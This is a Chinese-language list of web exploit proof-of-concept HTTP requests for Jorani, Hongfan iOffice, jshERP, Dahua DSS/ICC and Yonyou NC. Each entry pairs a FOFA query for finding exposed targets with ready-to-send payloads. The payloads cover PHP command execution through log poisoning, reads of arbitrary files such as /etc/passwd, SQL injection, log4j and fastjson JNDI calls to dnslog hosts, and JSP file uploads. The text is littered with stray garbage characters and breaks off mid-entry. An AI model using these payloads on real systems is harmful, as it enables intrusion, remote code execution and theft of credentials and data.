Pragma: no-cache) \( M( Z3 ]/ L _
Cache-Control: no-cache
7 \2 X& \. s4 K y5 h, [Upgrade-Insecure-Requests: 1
# K- ]# B4 n1 U% q/ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ p R6 L, _2 n# D1 n }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! p1 `8 |8 G# P7 Y1 \Accept-Encoding: gzip, deflate8 e9 W, e: p! O
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 U$ S/ q& A* xConnection: close* ~1 f' v: _# f
/ n8 u% N! O% p) ^* Y
3 Y. y1 D" | L5 z: P
12. Jorani < 1.0.2 远程命令执行5 l" }2 G0 ~5 M- ^% h+ e
FOFA:title="Jorani"
. b5 e; R/ s+ D) F* ?9 J第一步先拿到cookie
+ C4 `4 `: S1 G$ H8 l0 rGET /session/login HTTP/1.1/ f; C/ P7 ^. s
Host: 192.168.190.30, V, Z3 h! Q' H6 z" Z
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
7 Z2 l2 R- b& U- [. R' b6 sConnection: close
* p: F; u6 y$ EAccept-Encoding: gzip
5 Q+ _' c9 Y% } Z; f; I, i1 j: g# {6 s& \; D) j% K' B( L
1 p- }3 k" T$ Q) S/ M. i2 Y) F响应中csrf_cookie_jorani用于后续请求0 z, C$ a8 T& Q. C1 |% c$ m
HTTP/1.1 200 OK
, W1 q0 @% T8 v% D" O( ]Connection: close2 u6 @& \# N& I0 d# u0 u
Cache-Control: no-store, no-cache, must-revalidate' b) X, F: z& J; Y+ L0 H
Content-Type: text/html; charset=UTF-84 K* `) W" j* A
Date: Tue, 24 Oct 2023 09:34:28 GMT
0 i# E1 z% K& ]& L/ PExpires: Thu, 19 Nov 1981 08:52:00 GMT
0 z; P9 y u) T4 X; YLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT6 @# E) T3 W, K( s7 ]* x7 S' j
Pragma: no-cache
5 D, L& a( W2 L& C6 S+ k6 lServer: Apache/2.4.54 (Debian)
2 D _+ E9 c' [( ?8 t: F; M- V2 w, BSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/7 ~+ l6 P. E" ^7 `
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
9 Q0 \0 t& D3 ^3 l0 E: q+ N. x1 `( Z. mVary: Accept-Encoding S8 J1 h% H+ R3 \5 h
* C4 ?/ p$ \0 e
- n4 |2 w+ Y2 J: i5 k
POST请求,执行函数并进行base64编码( b H$ p, ~6 m2 k4 o! x1 A
POST /session/login HTTP/1.1
* r* s6 b- a7 _Host: 192.168.190.30
8 L) S- Q" x9 Z8 A+ h1 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
' T% b; B" ` O+ E$ a: {' N. ~Connection: close" ?0 O$ h8 _9 M5 @2 r; b8 n
Content-Length: 252
1 D0 ~5 n0 @) oContent-Type: application/x-www-form-urlencoded
" a7 ?: ]# | v1 |Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r9 U2 x' C9 d T+ X- d) U' w! {. E
Accept-Encoding: gzip
5 p4 e+ I l/ D( }, o% [
" n: l: [ r4 u$ [! bcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
7 w* i% d- s' S5 s% D* v! z# ~' W b3 i1 s& X8 H& T8 D. V
& E% B( R: m, u/ d. I; I% |7 D- ?* |+ q5 M) {7 E
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串7 \2 K0 {1 ]( Z! Y/ X
GET /pages/view/log-2023-10-24 HTTP/1.1
& O, I9 x" n1 hHost: 192.168.190.30 ]" w2 q: L) `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 N/ g; S8 A3 }, M5 [- E# n
Connection: close9 M9 q U- B* s$ ?
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r' _) l) s k/ x; J Y- p
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=8 j, y2 D4 S# }! Z% ]9 E6 l1 g
X-REQUESTED-WITH: XMLHttpRequest( e! X! f) i1 ~) R/ V/ h+ o
Accept-Encoding: gzip& g% K0 ]1 ?9 S* {0 ~2 \# r
2 R+ K4 k/ K' P" t; r/ i \% r
) L+ o k' X" D$ y P9 v2 L13. 红帆iOffice ioFileDown任意文件读取
; p& C2 Z+ O; O A- E. \& KFOFA:app="红帆-ioffice"
" e( T5 w, X' u' ?4 YGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1( o: A+ c' c4 X' C% Y8 C ?7 w
Host: x.x.x.x" ]- L$ |# k- F5 J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
# [& P5 L; `. p. g' L) [1 F2 fConnection: close, e5 T0 k; d8 U4 G
Accept: */*
! H" n) p0 g% D0 n s8 jAccept-Encoding: gzip
1 h4 o/ n+ U4 U& p* c @
) X4 f% u- y, q8 Q- K- ?4 \( b4 o
9 q2 K n6 E% v' b14. 华夏ERP(jshERP)敏感信息泄露: C$ q3 v+ y1 R# X7 r
FOFA:body="jshERP-boot"
, P3 |6 p5 l* `- h# I0 Y. ~/ ^% L泄露内容包括用户名密码+ [ d& |8 D; H s' E; c3 K) g
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
; O# u, Q9 r) F, [7 e1 `% eHost: x.x.x.x/ J: u0 Q, t, B Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36# E+ m! O" l! x; }3 F
Connection: close8 J6 e; n4 M. T) |5 k" S
Accept: */*
3 F6 `5 q. I: T3 {3 L# Y$ O8 N0 cAccept-Language: en1 D0 i% y6 N0 J5 |. F
Accept-Encoding: gzip& b" t7 d, o. t% Q3 C! g b
/ I' I/ y, \1 _' j( ?
S& f4 \8 g) S; @3 J2 f4 E# W15. 华夏ERP getAllList信息泄露
; ~- K+ o! m8 ^) {- gCVE-2024-0490$ }; u, L0 Q6 w
FOFA:body="jshERP-boot"/ c! c1 j, z) R
泄露内容包括用户名密码
0 t; c" X; m: d6 a) aGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
" A5 f& ^5 C6 _: x) vHost: 192.168.40.130:100
# K: ?3 X7 f7 o5 n1 b# [! UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
/ w7 o, E% J6 ~Connection: close
/ H8 h: B4 |% M! T* k4 ?Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ `; H5 T8 f$ N4 tAccept-Language: en" O V, B; K Z/ y
sec-ch-ua-platform: Windows$ |! _0 \8 K6 Y0 B! G
Accept-Encoding: gzip
, J4 ? Y, s7 f3 r7 \4 y2 ~9 ?2 G6 g$ p
0 g- o, a, @! ?8 p
16. 红帆HFOffice医微云SQL注入
W {5 {2 `& q* tFOFA:title="HFOffice"4 N7 x% _7 i. R% g/ S) J" v' c
poc中调用函数计算1234的md5值
/ p E8 U' |& F6 HGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
# ~2 ~9 l9 e9 `* u3 lHost: x.x.x.x! D) ?+ T5 K1 P: ]3 Y, L* {* D4 ]
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.368 C. w* u! l1 `$ _8 g( H
Connection: close
: P" { z1 y; Q7 e$ L1 ^( _Accept: */*) p2 c" m* D/ {( E% l; a
Accept-Language: en
4 H# N0 \# p! J. y9 CAccept-Encoding: gzip
! K0 a7 z0 K. s6 D7 c4 y+ ~4 k- F! \( v' I) z) }" k
+ Z9 j" b0 z& A2 X/ }; r( J7 `
17. 大华 DSS itcBulletin SQL 注入
% D9 E! ?7 Q3 s& E7 [% b! `$ G& [FOFA:app="dahua-DSS"
% S- x3 o- n( r7 f" g; OPOST /portal/services/itcBulletin?wsdl HTTP/1.1
% I1 ~$ E5 b! zHost: x.x.x.x0 n& }: [( s* z! @3 }9 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 B( x/ O# z; c% X
Connection: close
1 [( K) l2 @% P* L# KContent-Length: 345
9 F; L8 @: E0 S9 _Accept-Encoding: gzip4 t: s( G( I" P1 k K& K
& u& S5 k H9 \! f( D$ Z% Y6 \0 p<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
, R3 ?1 w2 E2 k' Z" u! P<s11:Body>% I- N: Y6 Q3 T& I
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>- E/ u5 M2 `* U `! w9 O2 T2 d
<netMarkings>
7 o# f* ]0 v4 |2 U* u (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1$ ?1 x) M7 n8 X9 l+ @
</netMarkings>/ e7 |7 r4 |" J
</ns1:deleteBulletin>
6 K5 o( m/ ~$ U" n+ B </s11:Body>
I$ Z2 I# [+ z! R* `</s11:Envelope>5 J0 Z; Y* u$ G1 b1 G4 R: g0 ^( x
e. s/ i1 ^( q7 h. t ^+ r
( s3 d0 b3 I% m# y( t0 ]+ E18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
8 J; s- f! j2 Q$ S9 x' ?, t: T8 aFOFA:app="dahua-DSS"
9 R' x, O; j! [: u2 g; cGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
R z2 s" c0 P# V& H+ r; V; O8 ZHost: your-ip6 K( n7 O3 l- s9 r% N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 y7 D, l* c8 ]1 n1 j# I4 RAccept-Encoding: gzip, deflate4 [8 Q1 j4 A# l: n' J5 n
Accept: */*
6 J' d5 L8 J0 O" |, m5 JConnection: keep-alive
: s) x5 S0 m Q% w% T3 K- Z8 }# E# n6 k
- A+ I5 y( x1 u5 }! d& d% K
$ Y! [" ^- p! Z( c4 ]3 Z. N `( S19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入0 f# K& H ` |7 @5 a
FOFA:app="dahua-DSS"
4 b+ Z6 R% J9 Z6 C6 VGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
5 @+ ?9 v1 _+ B: l. x0 y; `Host:6 V* F# C. [. B
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) t3 J' U% X5 M6 BAccept-Encoding: gzip, deflate8 j8 r4 H n7 s
Accept: */*
" R1 U5 l" n; n. R& yConnection: keep-alive
; {1 s D7 s x/ n. e. E$ G" C" d" l r+ h9 K% G
. Z& g+ t1 p/ M* ?
20. 大华ICC智能物联综合管理平台任意文件读取- [( R! ]/ {$ A3 D( s
FOFA:body="*客户端会小于800*"- D% ?1 W9 x% A
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
# q- o j" z; m: UHost: x.x.x.x
& j4 }% Q' X4 ]" C9 o* s+ O5 C) tUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: r4 t, [8 ~8 c( ^8 I6 d
Connection: close. l [0 g/ @# ?% v+ q
Accept: */*
8 ` Y& a. u7 pAccept-Language: en) f( D. l# u- J0 _9 B6 J h
Accept-Encoding: gzip; m& U1 M) D+ ?# n
& z: q3 V' ?9 U# d9 w6 n
! x S# Q. I& K* q21. 大华ICC智能物联综合管理平台random远程代码执行
& Y/ H/ f' q& Q- z0 pFOFA:icon_hash="-1935899595": t! G1 G, I( O- C5 d% v
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
V% t3 Y8 R e- U; g D, y; V: cHost: x.x.x.x9 M% L8 m4 }4 f! O9 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" D- A) N9 ~; b0 L4 V2 FContent-Length: 161
}! H$ E* p: O% lAccept-Encoding: gzip. H7 c g* [( `+ K
Connection: close+ S8 \- h, B( b; i
Content-Type: application/json;charset=utf-8
6 n) J+ s6 }! d, u7 c2 W' F
& q |) w1 {' t1 m- E3 H& F- K" a{
/ ?) S4 x3 {+ m"a":{3 m0 h7 o! T$ M9 l- U
"@type":"com.alibaba.fastjson.JSONObject",, j( ?) T1 f' ]% V. y. V( x
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}& _/ v0 q% E; g' R% |. M
}""" S8 ^, W0 W* [! S& ^ X# P" l
}
: k! G$ n# R- j1 K4 J+ Q* m# J) y' x. ~( [" t% ]
! v* U' H6 s K/ h22. 大华ICC智能物联综合管理平台 log4j远程代码执行
( m3 k# j& q( z! l) GFOFA:icon_hash="-1935899595"* c; B( P" G6 I* d0 \
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
( N+ I/ C6 U4 w% I* ?5 `" E- bHost: your-ip
1 O! e/ R+ @/ C6 | n+ w" UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) O8 I1 ?% L. O0 V6 b6 K3 u; eContent-Type: application/json;charset=utf-8
4 k& A( W3 `5 ^$ `
0 t& H4 X* M* [, \/ J4 ^/ x{
, N- X' P0 H/ D# q& G3 u9 b3 ]"loginName":"${jndi:ldap://dnslog}"
! y5 }" g$ l7 D: @, ]}
) u1 n9 [% a8 W2 e5 P
4 U5 W( z5 S# |6 X& }3 t0 C i6 a) E, d8 q
8 S4 I. a- W! ^; E7 V$ r* e23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 @& {% d1 o6 Z9 Z6 K+ YFOFA:icon_hash="-1935899595"/ Z5 A2 v$ o* I
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1" I! ^, A j5 ]4 U
Host: your-ip# }8 z, B5 d; T) z N" I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) `8 n) T. x LContent-Type: application/json;charset=utf-8
) v0 n+ G7 G+ o j. kAccept-Encoding: gzip5 H9 ^ A1 K6 b( K2 B; H
Connection: close6 X+ }, T6 {% h- u
0 a. v9 T F( s7 F+ H5 U6 t1 y' r{
j, O. y+ i2 ~" H& F "a":{! o" U) F- i, V4 I" }
"@type":"com.alibaba.fastjson.JSONObject",6 r- f3 T5 A/ ?. m+ ~
{"@type":"java.net.URL","val":"http://DNSLOG"}
+ i' F5 o1 q) i0 o' o/ Z }""
6 @ z. Z0 x- s7 O; s' \( O0 L}
, Q3 A0 w9 u+ Y9 f2 `; j/ u" L" T! U9 H. D" T5 C
8 H4 j) @' L V( u5 L& @24. 用友NC 6.5 accept.jsp任意文件上传
9 c8 d4 w6 k! w- k) CFOFA:icon_hash="1085941792"
0 o7 G2 `9 e* b7 \* R+ k8 c) _POST /aim/equipmap/accept.jsp HTTP/1.1
6 u& R2 Q5 @; T/ i* {Host: x.x.x.x4 D; o. o5 h# _$ k. B9 A5 q0 z7 c
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
9 I6 P1 N# F8 |Connection: close
6 L& L% C b; ]3 B- k' F% U$ h* l: HContent-Length: 449
4 M1 h1 ^2 w2 t5 t3 U" uAccept: */*
]- I* t4 U, U: Z6 M9 {$ ^1 ZAccept-Encoding: gzip
! t% g, n+ K% d6 f9 jContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
3 R9 x# r5 A0 h0 s" _/ i$ G8 J3 c% G
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% k2 Y/ V/ G5 T$ r6 K5 o _6 N/ xContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"4 D1 r E+ g; \1 [4 C/ B
Content-Type: text/plain
% y5 d1 L9 \& g }' U6 [; L& T5 T5 b) A) x4 V
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
; T: z6 y6 r: S3 x7 q-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* J% ?! m7 A+ e1 u$ r. L" W
Content-Disposition: form-data; name="fname"
: q( h# a; R5 _2 P" b7 ^5 B5 k. z3 i, `+ x% ?
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp4 {' o3 Q# o+ R2 c
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--$ N/ N# }% M# d p' I3 S( l
. [# ]% ]: z: Y/ S3 J/ v6 n) W/ t- I4 e/ H6 ^3 e
25. 用友NC registerServlet JNDI 远程代码执行. [% A. f! C5 c6 s
FOFA:app="用友-UFIDA-NC"% J+ t k" ~9 C/ e$ Q; L2 N
POST /portal/registerServlet HTTP/1.1
2 O; V6 V7 `1 u% ]9 Y$ E. o3 c# wHost: your-ip8 q0 {- K5 s& M* S7 G; R) _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
: C% {# P. x) o- N2 A' pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9' G! ?% {; j( G/ l4 s! m
Accept-Encoding: gzip, deflate
# K* n2 s3 j1 t; Y/ bAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
- i$ Z6 s% ^9 L7 NContent-Type: application/x-www-form-urlencoded! i2 ?& Z& J# j5 J7 ~4 D5 c! A
, V& N* ~$ i0 `0 y- ltype=1&dsname=ldap://dnslog
3 }' W. i: g% f! f% U% ^" I( E7 f
7 Z' t4 n6 l6 U" f" E& f( f- ?2 \
* H$ {3 L) j, {
26. 用友NC linkVoucher SQL注入6 B5 [$ z* G! Z% |
FOFA:app="用友-UFIDA-NC"
; Q3 e$ {1 L# m( x1 b* ^/ _' @8 ^GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 ?' L" L+ s% Z h+ lHost: your-ip2 ^! `4 l, M" `: a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 g9 p0 s# E: d; O+ i% L4 X
Content-Type: application/x-www-form-urlencoded
& I- c* m. e$ k: |! Q4 ]) U( IAccept-Encoding: gzip, deflate) H8 R( M5 s- T7 q0 h- Y: `
Accept: */*
* f( b# v6 P8 d$ hConnection: keep-alive _- R. P! z+ }' D% W; |
% w9 ]) `: s) f
) J( D, h9 G; @& ~4 R' _27. 用友 NC showcontent SQL注入; \% Z F- K1 Q3 ]; ?, c5 u
FOFA:icon_hash="1085941792"
3 _+ z2 U. i( I* GGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1( K1 q5 p7 {) F0 }4 i/ D) Y
Host: your-ip0 M1 R: D# |- x" }3 j* k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" a8 Y. i9 C2 N
Accept-Encoding: identity( ^: u- v/ o4 u/ V8 D- c. S6 Y
Connection: close. X1 Q1 R7 L( g; \
Content-Type: text/xml; charset=utf-8
( s( G5 I# Z$ n
1 x1 G( G( R$ {5 ~) V( ~7 I" ~. N' E
28. 用友NC grouptemplet 任意文件上传6 R! \6 c6 ?7 O6 O+ q
FOFA:icon_hash="1085941792"
( p* l8 B7 r2 q/ ePOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
! T! }! q4 [2 g8 {Host: x.x.x.x
! P$ n9 y3 ~) z$ Y' lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36! a9 A7 e/ a- O0 W3 q" w
Connection: close
9 X8 Y9 y+ S* L9 r+ XContent-Length: 2687 S6 I" ]8 {3 Q; x
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
6 X1 X4 s$ t( j5 c" k) `6 RAccept-Encoding: gzip8 j- u& [7 j3 K$ u2 e( r3 c
0 C4 E4 t. T0 b7 j+ g, y------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
" W- l' f- H1 u) s( A* m6 D. S9 CContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
- Y2 s+ Z9 E+ W3 C& u' q9 NContent-Type: application/octet-stream% c- m \8 C7 R$ l7 `1 L
! }7 u1 R' e9 H- P7 I& b, f<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>1 m) g! a) k( _& \( i
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
: M9 n o+ M( \. p$ j3 n. N& T
' _6 H$ z# j9 q1 S
/ D; E$ |/ W9 ]& l$ p- |2 B/uapim/static/pages/nc/head.jsp9 m. P: P9 i* A( [0 v3 c
) y! R, V) M! e. I! ?% B( D29. 用友NC down/bill SQL注入
4 `6 m/ z* ?8 i+ N8 g9 P( NFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ u: q* y+ \% i
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
' [* Y& m f9 gHost: your-ip3 v1 ?2 s4 S) }% q( ?8 T% G# l) Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: O6 o- G3 q5 ]1 d; xContent-Type: application/x-www-form-urlencoded
7 m* `+ Q' M1 ~5 ]4 dAccept-Encoding: gzip, deflate/ n) E) l# B3 Z* S) s5 o, c
Accept: */*3 J% [% j7 T* \( t% d( ~" C
Connection: keep-alive
4 ^) N( \7 m) f4 k, p' ?: }4 s2 p0 c
7 Z K8 }% u% ?' {- }7 L1 n30. 用友NC importPml SQL注入7 d: ?1 j" r# L/ t) o
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
$ G$ B" R1 U u+ x# UPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.14 T) n/ F: B( m( {
Host: your-ip$ Q/ [5 e' p) J2 j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
; y: E& {+ s' |+ w) x$ }; Q5 O# x* cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ @: G' i4 z3 H: ^Connection: close1 i+ r; X1 W6 B( A7 G
9 Q |5 r. Y6 V) k* P------WebKitFormBoundaryH970hbttBhoCyj9V
; F" V: N, w% U0 LContent-Disposition: form-data; name="Filedata"; filename="1.jpg"6 |( t R9 C2 I# \" T0 J1 a
Content-Type: image/jpeg8 T$ |* T' O3 J* n4 D
------WebKitFormBoundaryH970hbttBhoCyj9V--
$ S6 v4 k! Z* b' i$ l! @4 n$ Y% S/ o* g" r& G" G
" K/ s- J) s+ Z3 y* Q
31. 用友NC runStateServlet SQL注入0 k0 l7 w! L% Y! z5 |+ E
version<=6.5
+ _* h* n4 O3 L% `+ s# i# iFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
( O' |2 o6 ]# J* o- {6 FGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.15 l/ W4 {' j3 u5 Q
Host: host# K0 g' t |+ F" n. `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 u, f% d7 k2 T( h7 o8 M) D& P- kContent-Type: application/x-www-form-urlencoded3 [) c1 J1 w2 R$ e4 i$ ?, X/ b
# j- J+ Y1 S5 s. v8 U+ G
1 P+ v' g+ k- d; F+ o7 U32. 用友NC complainbilldetail SQL注入
1 F+ [; ^0 j2 O: C; lversion= NC633、NC65 _9 Q! \) K+ C, N
FOFA:app="用友-UFIDA-NC"+ u% Z9 g4 ?& ~" A- ?
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' D+ ]7 ] j8 I6 s6 PHost: your-ip
! A, W7 w5 ?* }8 S9 U" M' IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' [1 S5 C$ d d# o* H, }+ s$ e3 w- q
Content-Type: application/x-www-form-urlencoded
& \, `: U& W$ x6 U! d# @) YAccept-Encoding: gzip, deflate
# J1 X5 v9 [" J0 R- u& \& I2 GAccept: */*/ W, H& S# Q' I# C0 y
Connection: keep-alive
4 B: _" s6 G. c) J9 q# H$ f6 X* t, T% }0 w/ ^' \, m
6 M- k) \& N% p" p* k
33. 用友NC downTax/download SQL注入0 _, ~1 a0 `* Z; y
version:NC6.5FOFA:app="用友-UFIDA-NC"
/ f6 c9 X1 B$ y5 n5 q x% XGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
; [& H. L- _1 P0 H$ C* X4 zHost: your-ip
z4 K/ Y7 ]! e* {, hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& G: D: K" `/ c9 z/ Y! A t
Content-Type: application/x-www-form-urlencoded# n0 w- Q! E+ d
Accept-Encoding: gzip, deflate8 t) {% N: M; n }
Accept: */*/ {# p/ \5 n( ^+ d6 f+ a2 R
Connection: keep-alive" z. @0 O g1 R1 w. o0 J1 p
9 w: _3 C( L# S p, D, [( u
: Q7 p# t! z8 d+ j3 U
34. 用友NC warningDetailInfo接口SQL注入! U, P1 j- t; ]7 z C
FOFA:app="用友-UFIDA-NC"
/ a C- `3 ?2 n$ n. y" o+ pGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( I) ~- q; k! t( R# I x, x1 \: ~Host: your-ip
, Y o' y# ]) x) RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ Y7 D# w; U& q, t# g
Content-Type: application/x-www-form-urlencoded
b2 |5 N8 c# ?5 s; c3 m- u/ R- bAccept-Encoding: gzip, deflate; a% j2 A. M9 c0 ~- v& M
Accept: */** }9 J, X; A, Y
Connection: keep-alive
9 j7 P. _, Y* a4 ?+ d- n5 t
8 ~" A* r4 g; z8 j# ~5 z; j& g2 y% o& `) C% S
35. 用友NC-Cloud importhttpscer任意文件上传
1 Z# Q0 I6 W" v3 U) Y" `8 MFOFA:app="用友-NC-Cloud". M3 S! ]) O& B2 d y: ^: w* t, s
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1- y" }7 L' A$ w# ~9 o
Host: 203.25.218.166:8888& A. L6 d/ P) v" V
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
